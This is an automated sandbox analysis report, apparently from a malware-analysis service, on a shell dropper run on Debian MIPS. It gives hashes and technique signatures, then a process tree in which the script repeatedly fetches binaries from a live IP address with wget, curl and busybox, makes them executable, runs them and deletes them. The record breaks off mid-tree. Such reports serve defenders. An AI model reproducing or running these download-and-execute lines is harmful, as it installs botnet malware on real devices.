d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c

Analysis

max time kernel
87s
max time network
89s
platform
debian-9_mips
resource
debian9-mipsbe-20240729-en
resource tags

arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
21-11-2024 08:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh
Size

10KB
MD5

8abf2434594ba2dffa54b25832749b54
SHA1

0e89289d57c7377b331a82fbfaca526ccd8bb78e
SHA256

d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c
SHA512

02c0ada458d3f0b7d057957c42ac1ed0493daa06e48ff877c07a7120a3cd5a5e88dc2ba46a95cc6c2752b8f570c19a697220bc733f2c8653c42d770e7aa033a1
SSDEEP

96:KVh5RKWVHduuHsnbBWwwiDcO0UCn14IuuHsnbRWwwiDqOVvhkEy1n44h5RKWVRNs:KxL8a1DrE

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	process
889	chmod
919	chmod
955	chmod
967	chmod
973	chmod
991	chmod
751	chmod
871	chmod
907	chmod
943	chmod
789	chmod
816	chmod
856	chmod
865	chmod
979	chmod
808	chmod
846	chmod
949	chmod
895	chmod
937	chmod
913	chmod
931	chmod
985	chmod
901	chmod
925	chmod
877	chmod
883	chmod
961	chmod

Executes dropped EXE 28 IoCs

Processes:

OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oCpstocrnn33XyZPJSPVD6DADzQDT0PtgRbC6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hWk9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQQp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON50U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4CiV8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKXBU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOilPO3tXEHa3zKtcSh7sDc20GioPz4Cc1OzffQp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON50U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4CiV8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKXBU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOilPO3tXEHa3zKtcSh7sDc20GioPz4Cc1OzffOL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oCpstocrnn33XyZPJSPVD6DADzQDT0PtgRbC6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hWk9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

wgetcurlk9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQwgetcurlk9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQrmbusyboxrmbusybox

pid process

851 wget
854 curl
857 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
988 wget
989 curl
992 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
993 rm
855 busybox
858 rm
990 busybox

pid	process
851	wget
854	curl
857	k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
988	wget
989	curl
992	k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
993	rm
855	busybox
858	rm
990	busybox

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC	curl
File opened for modification	/tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3	curl
File opened for modification	/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4	curl
File opened for modification	/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1	curl
File opened for modification	/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil	curl
File opened for modification	/tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3	curl
File opened for modification	/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4	curl
File opened for modification	/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463	curl
File opened for modification	/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ	curl
File opened for modification	/tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff	curl
File opened for modification	/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil	curl
File opened for modification	/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5	curl
File opened for modification	/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463	curl
File opened for modification	/tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC	curl
File opened for modification	/tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC	curl
File opened for modification	/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5	curl
File opened for modification	/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX	curl
File opened for modification	/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ	curl
File opened for modification	/tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ	curl
File opened for modification	/tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW	curl
File opened for modification	/tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ	curl
File opened for modification	/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX	curl
File opened for modification	/tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC	curl
File opened for modification	/tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW	curl
File opened for modification	/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1	curl
File opened for modification	/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci	curl
File opened for modification	/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci	curl
File opened for modification	/tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff	curl

/tmp/d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh
/tmp/d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh
1⤵
PID:719
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:721
- /usr/bin/wget
  wget http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  PID:727
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:748
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  PID:750
- /bin/chmod
  chmod 777 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  - File and Directory Permissions Modification
  PID:751
- /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  ./OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  - Executes dropped EXE
  PID:752
- /bin/rm
  rm OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  PID:753
- /usr/bin/wget
  wget http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  PID:754
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:755
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  PID:784
- /bin/chmod
  chmod 777 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  - File and Directory Permissions Modification
  PID:789
- /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  ./LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  - Executes dropped EXE
  PID:790
- /bin/rm
  rm LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  PID:795
- /usr/bin/wget
  wget http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  PID:797
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:805
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  PID:807
- /bin/chmod
  chmod 777 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  - File and Directory Permissions Modification
  PID:808
- /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  ./pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  - Executes dropped EXE
  PID:809
- /bin/rm
  rm pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  PID:810
- /usr/bin/wget
  wget http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  PID:811
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:812
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  PID:813
- /bin/chmod
  chmod 777 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  - File and Directory Permissions Modification
  PID:816
- /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  ./6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  - Executes dropped EXE
  PID:818
- /bin/rm
  rm 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  PID:822
- /usr/bin/wget
  wget http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  PID:823
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:830
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  PID:840
- /bin/chmod
  chmod 777 UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  - File and Directory Permissions Modification
  PID:846
- /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  ./UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  - Executes dropped EXE
  PID:847
- /bin/rm
  rm UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  PID:849
- /usr/bin/wget
  wget http://216.126.231.240/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - System Network Configuration Discovery
  PID:851
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:854
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - System Network Configuration Discovery
  PID:855
- /bin/chmod
  chmod 777 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - File and Directory Permissions Modification
  PID:856
- /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  ./k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:857
- /bin/rm
  rm k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - System Network Configuration Discovery
  PID:858
- /usr/bin/wget
  wget http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  PID:859
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:863
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  PID:864
- /bin/chmod
  chmod 777 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  - File and Directory Permissions Modification
  PID:865
- /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  ./Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  - Executes dropped EXE
  PID:866
- /bin/rm
  rm Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  PID:867
- /usr/bin/wget
  wget http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  PID:868
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:869
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  PID:870
- /bin/chmod
  chmod 777 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  - File and Directory Permissions Modification
  PID:871
- /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  ./0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  - Executes dropped EXE
  PID:872
- /bin/rm
  rm 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  PID:873
- /usr/bin/wget
  wget http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  PID:874
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:875
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  PID:876
- /bin/chmod
  chmod 777 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  - File and Directory Permissions Modification
  PID:877
- /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  ./Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  - Executes dropped EXE
  PID:878
- /bin/rm
  rm Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  PID:879
- /usr/bin/wget
  wget http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  PID:880
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:881
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  PID:882
- /bin/chmod
  chmod 777 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  - File and Directory Permissions Modification
  PID:883
- /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  ./V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  - Executes dropped EXE
  PID:884
- /bin/rm
  rm V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  PID:885
- /usr/bin/wget
  wget http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  PID:886
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:887
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  PID:888
- /bin/chmod
  chmod 777 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  - File and Directory Permissions Modification
  PID:889
- /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  ./zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  - Executes dropped EXE
  PID:890
- /bin/rm
  rm zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  PID:891
- /usr/bin/wget
  wget http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  PID:892
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:893
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  PID:894
- /bin/chmod
  chmod 777 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  - File and Directory Permissions Modification
  PID:895
- /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  ./BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  - Executes dropped EXE
  PID:896
- /bin/rm
  rm BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  PID:897
- /usr/bin/wget
  wget http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  PID:898
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:899
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  PID:900
- /bin/chmod
  chmod 777 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  - File and Directory Permissions Modification
  PID:901
- /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  ./2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  - Executes dropped EXE
  PID:902
- /bin/rm
  rm 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  PID:903
- /usr/bin/wget
  wget http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  PID:904
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:905
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  PID:906
- /bin/chmod
  chmod 777 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  - File and Directory Permissions Modification
  PID:907
- /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  ./PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  - Executes dropped EXE
  PID:908
- /bin/rm
  rm PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  PID:909
- /usr/bin/wget
  wget http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  PID:910
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:911
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  PID:912
- /bin/chmod
  chmod 777 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  - File and Directory Permissions Modification
  PID:913
- /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  ./Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  - Executes dropped EXE
  PID:914
- /bin/rm
  rm Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
  2⤵
  PID:915
- /usr/bin/wget
  wget http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  PID:916
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:917
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  PID:918
- /bin/chmod
  chmod 777 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  - File and Directory Permissions Modification
  PID:919
- /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  ./0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  - Executes dropped EXE
  PID:920
- /bin/rm
  rm 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
  2⤵
  PID:921
- /usr/bin/wget
  wget http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  PID:922
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:923
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  PID:924
- /bin/chmod
  chmod 777 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  - File and Directory Permissions Modification
  PID:925
- /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  ./Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  - Executes dropped EXE
  PID:926
- /bin/rm
  rm Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
  2⤵
  PID:927
- /usr/bin/wget
  wget http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  PID:928
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:929
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  PID:930
- /bin/chmod
  chmod 777 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  - File and Directory Permissions Modification
  PID:931
- /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  ./V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  - Executes dropped EXE
  PID:932
- /bin/rm
  rm V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
  2⤵
  PID:933
- /usr/bin/wget
  wget http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  PID:934
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:935
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  PID:936
- /bin/chmod
  chmod 777 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  - File and Directory Permissions Modification
  PID:937
- /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  ./zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  - Executes dropped EXE
  PID:938
- /bin/rm
  rm zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
  2⤵
  PID:939
- /usr/bin/wget
  wget http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  PID:940
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:941
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  PID:942
- /bin/chmod
  chmod 777 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  - File and Directory Permissions Modification
  PID:943
- /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  ./BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  - Executes dropped EXE
  PID:944
- /bin/rm
  rm BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
  2⤵
  PID:945
- /usr/bin/wget
  wget http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  PID:946
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:947
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  PID:948
- /bin/chmod
  chmod 777 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
  2⤵
  - File and Directory Permissions Modification
  PID:949
- /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
